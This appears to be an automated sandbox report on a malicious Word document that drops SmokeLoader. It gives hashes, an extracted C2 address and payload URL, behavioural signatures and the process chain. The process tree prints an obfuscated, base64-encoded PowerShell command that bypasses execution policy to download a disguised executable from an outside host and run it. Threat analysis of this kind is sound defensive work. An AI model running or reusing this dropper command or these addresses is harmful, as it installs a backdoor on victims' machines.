Analysis
-
max time kernel
101s -
max time network
100s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-04-2021 09:01
Static task
static1
Behavioral task
behavioral1
Sample
2021lk049459.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2021lk049459.doc
Resource
win10v20210408
General
-
Target
2021lk049459.doc
-
Size
2.2MB
-
MD5
40f9df41effa8762858974452db083d9
-
SHA1
fd382c2ae4ad3545b5d198d8c51735045584f8ce
-
SHA256
06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd
-
SHA512
f09b0b5415ac3f1c9af5f13774bb01675540a3238ac23301b404f13fb847f62725e7ad03f7de7b0fbecf19c90ee2be53b5e7b09aada12780f7685258b54f58f2
Malware Config
Extracted
https://u.teknik.io/bHrgG.jpg
Extracted
smokeloader
2018
http://94.140.114.59/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 4 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 6 1804 EQNEDT32.EXE 8 1804 EQNEDT32.EXE 10 1804 EQNEDT32.EXE 11 1148 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
69577.exenTvWNOa.exepid process 1460 69577.exe 1528 nTvWNOa.exe -
Loads dropped DLL 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exepid process 1804 EQNEDT32.EXE 1148 powershell.exe 1148 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
nTvWNOa.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum nTvWNOa.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 nTvWNOa.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 452 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 740 powershell.exe 740 powershell.exe 1148 powershell.exe 1148 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
nTvWNOa.exepid process 1528 nTvWNOa.exe 1528 nTvWNOa.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe -
Suspicious use of FindShellTrayWindow 11 IoCs
Processes:
69577.exepid process 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe -
Suspicious use of SendNotifyMessage 11 IoCs
Processes:
69577.exepid process 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe 1460 69577.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 452 WINWORD.EXE 452 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WINWORD.EXEEQNEDT32.EXE69577.exepowershell.exepowershell.exedescription pid process target process PID 452 wrote to memory of 1280 452 WINWORD.EXE splwow64.exe PID 452 wrote to memory of 1280 452 WINWORD.EXE splwow64.exe PID 452 wrote to memory of 1280 452 WINWORD.EXE splwow64.exe PID 452 wrote to memory of 1280 452 WINWORD.EXE splwow64.exe PID 1804 wrote to memory of 1460 1804 EQNEDT32.EXE 69577.exe PID 1804 wrote to memory of 1460 1804 EQNEDT32.EXE 69577.exe PID 1804 wrote to memory of 1460 1804 EQNEDT32.EXE 69577.exe PID 1804 wrote to memory of 1460 1804 EQNEDT32.EXE 69577.exe PID 1460 wrote to memory of 740 1460 69577.exe powershell.exe PID 1460 wrote to memory of 740 1460 69577.exe powershell.exe PID 1460 wrote to memory of 740 1460 69577.exe powershell.exe PID 1460 wrote to memory of 740 1460 69577.exe powershell.exe PID 740 wrote to memory of 1148 740 powershell.exe powershell.exe PID 740 wrote to memory of 1148 740 powershell.exe powershell.exe PID 740 wrote to memory of 1148 740 powershell.exe powershell.exe PID 740 wrote to memory of 1148 740 powershell.exe powershell.exe PID 1148 wrote to memory of 1528 1148 powershell.exe nTvWNOa.exe PID 1148 wrote to memory of 1528 1148 powershell.exe nTvWNOa.exe PID 1148 wrote to memory of 1528 1148 powershell.exe nTvWNOa.exe PID 1148 wrote to memory of 1528 1148 powershell.exe nTvWNOa.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049459.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\69577.exe"C:\Users\Public\69577.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exeMD5
3cf58ec9de521b32015552ca3024d1cd
SHA1539236ecd9d859f82f89311bfd564906aa98451e
SHA256ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
SHA51225d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
b4315c84bf5773b6dd43a1261b9b04be
SHA137f8e667b99a402337f3dd42c6aa3e1d760e8c00
SHA2561838e21fdbcee13750e7b73a738dad458ab7698505097b71002dac30b7a1cc10
SHA512f2005209dafbca8c71ac04b4c48a3fd8d5360b81b617e5e47c762093af885e68e29d262a4d86a0eb8ab3d5400dfb3011897d4059ab1084248479e2bf4662dd1f
-
C:\Users\Public\69577.exeMD5
2c2cb2aa0782874d3c14cdd6f063f979
SHA1583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA51234c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
-
C:\Users\Public\69577.exeMD5
2c2cb2aa0782874d3c14cdd6f063f979
SHA1583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA51234c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
-
\Users\Admin\AppData\Local\Temp\nTvWNOa.exeMD5
3cf58ec9de521b32015552ca3024d1cd
SHA1539236ecd9d859f82f89311bfd564906aa98451e
SHA256ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
SHA51225d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
-
\Users\Admin\AppData\Local\Temp\nTvWNOa.exeMD5
3cf58ec9de521b32015552ca3024d1cd
SHA1539236ecd9d859f82f89311bfd564906aa98451e
SHA256ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
SHA51225d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
-
\Users\Public\69577.exeMD5
2c2cb2aa0782874d3c14cdd6f063f979
SHA1583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA51234c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26
-
memory/452-60-0x0000000072881000-0x0000000072884000-memory.dmpFilesize
12KB
-
memory/452-61-0x0000000070301000-0x0000000070303000-memory.dmpFilesize
8KB
-
memory/452-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/452-113-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/740-78-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/740-71-0x0000000000000000-mapping.dmp
-
memory/740-75-0x0000000000ED0000-0x0000000000ED1000-memory.dmpFilesize
4KB
-
memory/740-76-0x0000000000ED2000-0x0000000000ED3000-memory.dmpFilesize
4KB
-
memory/740-77-0x00000000025C0000-0x00000000025C1000-memory.dmpFilesize
4KB
-
memory/740-73-0x0000000000E40000-0x0000000000E41000-memory.dmpFilesize
4KB
-
memory/740-74-0x0000000004780000-0x0000000004781000-memory.dmpFilesize
4KB
-
memory/1148-95-0x0000000006180000-0x0000000006181000-memory.dmpFilesize
4KB
-
memory/1148-104-0x00000000063E0000-0x00000000063E1000-memory.dmpFilesize
4KB
-
memory/1148-86-0x0000000004920000-0x0000000004921000-memory.dmpFilesize
4KB
-
memory/1148-90-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/1148-79-0x0000000000000000-mapping.dmp
-
memory/1148-96-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1148-97-0x0000000006270000-0x0000000006271000-memory.dmpFilesize
4KB
-
memory/1148-87-0x0000000004922000-0x0000000004923000-memory.dmpFilesize
4KB
-
memory/1148-105-0x0000000006400000-0x0000000006401000-memory.dmpFilesize
4KB
-
memory/1280-64-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmpFilesize
8KB
-
memory/1280-63-0x0000000000000000-mapping.dmp
-
memory/1356-112-0x0000000003CB0000-0x0000000003CC5000-memory.dmpFilesize
84KB
-
memory/1356-111-0x0000000003B60000-0x0000000003B61000-memory.dmpFilesize
4KB
-
memory/1460-67-0x0000000000000000-mapping.dmp
-
memory/1528-108-0x0000000000000000-mapping.dmp
-
memory/1804-65-0x00000000753E1000-0x00000000753E3000-memory.dmpFilesize
8KB